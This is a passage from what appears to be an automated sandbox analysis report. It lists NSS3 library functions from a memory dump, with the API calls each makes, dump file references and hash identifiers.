                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124EA
                                                                                        • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124F5
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Alloc_FreeK11_Utilfree
                                                                                        • String ID:
                                                                                        • API String ID: 2595244113-0
                                                                                        • Opcode ID: 0854132c1becee94ce9282063dd1c34c2c8d1dc54aef8e7dc74bd8179ee2bab7
                                                                                        • Instruction ID: 26746acf249870705f045868ad335fb2c07cdaca4e2182020e3d10d8b924ed56
                                                                                        • Opcode Fuzzy Hash: 0854132c1becee94ce9282063dd1c34c2c8d1dc54aef8e7dc74bd8179ee2bab7
                                                                                        • Instruction Fuzzy Hash: D43131B0A0411AABEB008FA5CD09BBBB7A4EF49309F144125FD2496A80EB34DD54C7A1
                                                                                        Function 6C718530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$IdentitiesLayermemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2311246771-0
                                                                                        • Opcode ID: f542126cc141d7c297c808e3edd7794f771c62c2c463d1dc121cb96834700d51
                                                                                        • Instruction ID: e91ebbcb5d24eb8acb3af43cafbe74d4e6f48a209a1bdb006d545642bd42c675
                                                                                        • Opcode Fuzzy Hash: f542126cc141d7c297c808e3edd7794f771c62c2c463d1dc121cb96834700d51
                                                                                        • Instruction Fuzzy Hash: 604193B0609701CBEB109F38D64476AB7B5FF45308F16867AD89887F62DB30D485CB96
                                                                                        Function 6C67EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C67EDFD
                                                                                        • calloc.MOZGLUE(00000001,00000000), ref: 6C67EE64
                                                                                        • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C67EECC
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C67EEEB
                                                                                        • free.MOZGLUE(?), ref: 6C67EEF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorValuecallocfreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3833505462-0
                                                                                        • Opcode ID: 3343df9aad5cfc63d20eeb2994e7b89bf340f3a3e4fa7ba230db0e707bd05df8
                                                                                        • Instruction ID: be3e68cbbddee123f1a852fc982650e0f0fce70ced891db09d92e81f68e7dd2c
                                                                                        • Opcode Fuzzy Hash: 3343df9aad5cfc63d20eeb2994e7b89bf340f3a3e4fa7ba230db0e707bd05df8
                                                                                        • Instruction Fuzzy Hash: 2331D271A002019FEB309F28CC45BA67BB4FB4A315F140E39E85A87A51DB31E459CBF9
                                                                                        Function 6C79A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C79A55C
                                                                                        • PR_IntervalNow.NSS3 ref: 6C79A573
                                                                                        • PR_IntervalNow.NSS3 ref: 6C79A5A5
                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C79A603
                                                                                          • Part of subcall function 6C749890: TlsGetValue.KERNEL32(?,?,?,6C7497EB), ref: 6C74989E
                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C79A636
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interval$CriticalEnterSectionValue
                                                                                        • String ID:
                                                                                        • API String ID: 959321092-0
                                                                                        • Opcode ID: de569dbaddb068c5f03c303b0b0296394e71f4b5c9773007bccf90887498f4eb
                                                                                        • Instruction ID: e1558871974ec14038f9762b17a12fce55730d8a32db3f141ed19b2973d4a1c6
                                                                                        • Opcode Fuzzy Hash: de569dbaddb068c5f03c303b0b0296394e71f4b5c9773007bccf90887498f4eb
                                                                                        • Instruction Fuzzy Hash: A0315EB1A026058FCB00DF29D688A5AB7F9BF55329B258575D8148BB16E730E884CB90
                                                                                        Function 6C6844D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3 ref: 6C6844FF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C684524
                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C684537
                                                                                        • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C684579
                                                                                          • Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C6841BE
                                                                                          • Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6841E9
                                                                                          • Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C684227
                                                                                          • Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C68423D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C68459C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
                                                                                        • String ID:
                                                                                        • API String ID: 3193526912-0
                                                                                        • Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                        • Instruction ID: 305c76576208639567a4abf1b7d03f777a902a50b21ff12cc2e3f8bf7637e2c5
                                                                                        • Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                        • Instruction Fuzzy Hash: D021C7B16072009BEB10CE65AC54BBF77AD9F41758F140428A9158BBC1EBA1E904C6BA
                                                                                        Function 6C68E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C68E755,00000000,00000004,?,?), ref: 6C68E5F5
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C68E62C
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C68E63E
                                                                                          • Part of subcall function 6C6DF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C67F379,?,00000000,-00000002), ref: 6C6DF9B7
                                                                                        • PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C68E65C
                                                                                          • Part of subcall function 6C6ADDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6ADDEC
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C6ADE70
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C6ADE83
                                                                                          • Part of subcall function 6C6ADDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C6ADE95
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C6ADEAE
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6ADEBB
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C68E68E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
                                                                                        • String ID:
                                                                                        • API String ID: 2865137721-0
                                                                                        • Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
                                                                                        • Instruction ID: f0c40b8e0f0f802c2e8ede5de2cdf6e7b8437712ccf49ef09fbc4e8a39082539
                                                                                        • Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
                                                                                        • Instruction Fuzzy Hash: 0D21437AB03200AFFB005EA4DC80FAB77989F85358F154134EE0887A65EB21DD14C3E9
                                                                                        Function 6C68AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADA7
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADB4
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,6C683FFF,?,?,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000), ref: 6C68ADD5
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7A94B0,?,?,?,?,?,?,?,?,6C683FFF,00000000,?), ref: 6C68ADEC
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C683FFF), ref: 6C68AE3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2372449006-0
                                                                                        • Opcode ID: d7bcdff7f4dbe4b38c05899586ee910b0102c216773d8746e4cfbff50bd6f366
                                                                                        • Instruction ID: c1e18285e89af3aba066d5ad0ffed01caa2d25f44b75af99dbfee7fdba17d999
                                                                                        • Opcode Fuzzy Hash: d7bcdff7f4dbe4b38c05899586ee910b0102c216773d8746e4cfbff50bd6f366
                                                                                        • Instruction Fuzzy Hash: 83115661E013085BF7009B649C04BBF73E89F9624DF048629EC1986782FB20E95982FA
                                                                                        Function 6C7104C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
                                                                                        • TlsGetValue.KERNEL32(?,00000000,?,6C71461B,-00000004), ref: 6C710510
                                                                                        • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C710520
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534
                                                                                        • GetLastError.KERNEL32(?,6C71461B,-00000004), ref: 6C710543
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                        • String ID:
                                                                                        • API String ID: 3052423345-0
                                                                                        • Opcode ID: 31b6127d5bd1904d550d90dc5e45aaa62307ab9b0394b3ad3c67dd9082d4e42e
                                                                                        • Instruction ID: d05067325179c87b08e6c8e8c884b522bc2483f13a73444adf3b27cae0660a74
                                                                                        • Opcode Fuzzy Hash: 31b6127d5bd1904d550d90dc5e45aaa62307ab9b0394b3ad3c67dd9082d4e42e
                                                                                        • Instruction Fuzzy Hash: C011E771A081459BEB006E389D08F663BA8AF02319F684635E529D7D91EF31E564CB91
                                                                                        Function 6C6ACD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C6C1E10: TlsGetValue.KERNEL32 ref: 6C6C1E36
                                                                                          • Part of subcall function 6C6C1E10: EnterCriticalSection.KERNEL32(?,?,?,6C69B1EE,2404110F,?,?), ref: 6C6C1E4B
                                                                                          • Part of subcall function 6C6C1E10: PR_Unlock.NSS3 ref: 6C6C1E76
                                                                                        • free.MOZGLUE(?,6C6AD079,00000000,00000001), ref: 6C6ACDA5
                                                                                        • PK11_FreeSymKey.NSS3(?,6C6AD079,00000000,00000001), ref: 6C6ACDB6
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C6AD079,00000000,00000001), ref: 6C6ACDCF
                                                                                        • DeleteCriticalSection.KERNEL32(?,6C6AD079,00000000,00000001), ref: 6C6ACDE2
                                                                                        • free.MOZGLUE(?), ref: 6C6ACDE9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                        • String ID:
                                                                                        • API String ID: 1720798025-0
                                                                                        • Opcode ID: 6e0d054221035a4f4c64d48d8cd6fcd0ffc66866f42604f08876dd02eeb9760b
                                                                                        • Instruction ID: b977ffd8251f6bb128596062914e49003d633b33efbc0b97f1c9e73c01307c99
                                                                                        • Opcode Fuzzy Hash: 6e0d054221035a4f4c64d48d8cd6fcd0ffc66866f42604f08876dd02eeb9760b
                                                                                        • Instruction Fuzzy Hash: 0011E0B2B01111BBDB00ABA4EC44996B7ACFF04369B140171E90A83E01E732F825CBE9
                                                                                        Function 6C712CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712CEC
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712D02
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712D1F
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712D42
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712D5B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                        • String ID:
                                                                                        • API String ID: 1593528140-0
                                                                                        • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                        • Instruction ID: f09ce48c543e49759768657eab3b1642f3ec725ba2d085dec809e432085e8d27
                                                                                        • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                        • Instruction Fuzzy Hash: A90148B19542005BE7308F29FE09BC7B3A5EF52318F084435E89986F22D632F4148792
                                                                                        Function 6C712D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712D9C
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712DB2
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712DCF
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712DF2
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712E0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                        • String ID:
                                                                                        • API String ID: 1593528140-0
                                                                                        • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                        • Instruction ID: 47cb7a6e13ed3090ab38021ee0d043e182b8adea3d702186988b1f56fa08025c
                                                                                        • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                        • Instruction Fuzzy Hash: 7801C8B1A542045FE7309E29FE0DBC7B7A5EF52318F084435E89986F12D632F5198693
                                                                                        Function 6C79ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE0D
                                                                                        • free.MOZGLUE(?), ref: 6C79AE14
                                                                                        • DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE36
                                                                                        • free.MOZGLUE(?), ref: 6C79AE3D
                                                                                        • free.MOZGLUE(00000000,00000000,?,?,6C79A6D8), ref: 6C79AE47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
